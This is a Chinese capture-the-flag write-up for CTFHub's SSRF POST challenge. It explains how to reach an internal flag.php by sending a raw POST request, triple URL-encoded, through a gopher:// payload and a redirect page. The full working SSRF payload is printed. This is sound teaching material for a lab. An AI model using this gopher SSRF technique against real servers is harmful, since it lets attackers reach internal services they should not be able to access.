CTFHUB-技能树-Web-SSRF-POST

提示：

访问题目url，先尝试一下flag.php，发现一个key值

根据提示尝试一下302.php
得到提示

header("Location：{$_GET['url']}");的意思是重定向页面到GET到url的内容，根据提示我们要构造一个POST请求

一般格式：

POST /flag.php HTTP/1.1 //flag肯定是在flag.php里
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded //文本类型
Content-Length: 36 //长度为下面全部数据的长度

key=a80ea933ead842996c204517423ae75e //key值是前面得到的

然后进行url三次编码即（注：第一次url编码后要手动在所有%0A前面加上%0D，再进行后续编码）

POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253Da80ea933ead842996c204517423ae75e

这里运用了gopher协议，先构造payload再解释

gopher协议：互联网上使用的分布型的文件搜集获取网络协议，是一种分布式文档传递服务。利用该服务，用户可以无缝地浏览、搜索和检索驻留在不同位置的信息
使用方法：gopher://ip:port/_payload

此题整体思路：尝试读取flag.php和提示的302.php --> 根据所得信息选择SSRF漏洞可用的url伪协议 --> 构造payload

payload解释：根据302.php的源码可以知道，需要以GET方式传递一个url参数，并且会重定向到其指定的地址，用gopher协议可以查看该地址的信息，进行三次的url编码是因为客户端到服务端解析方式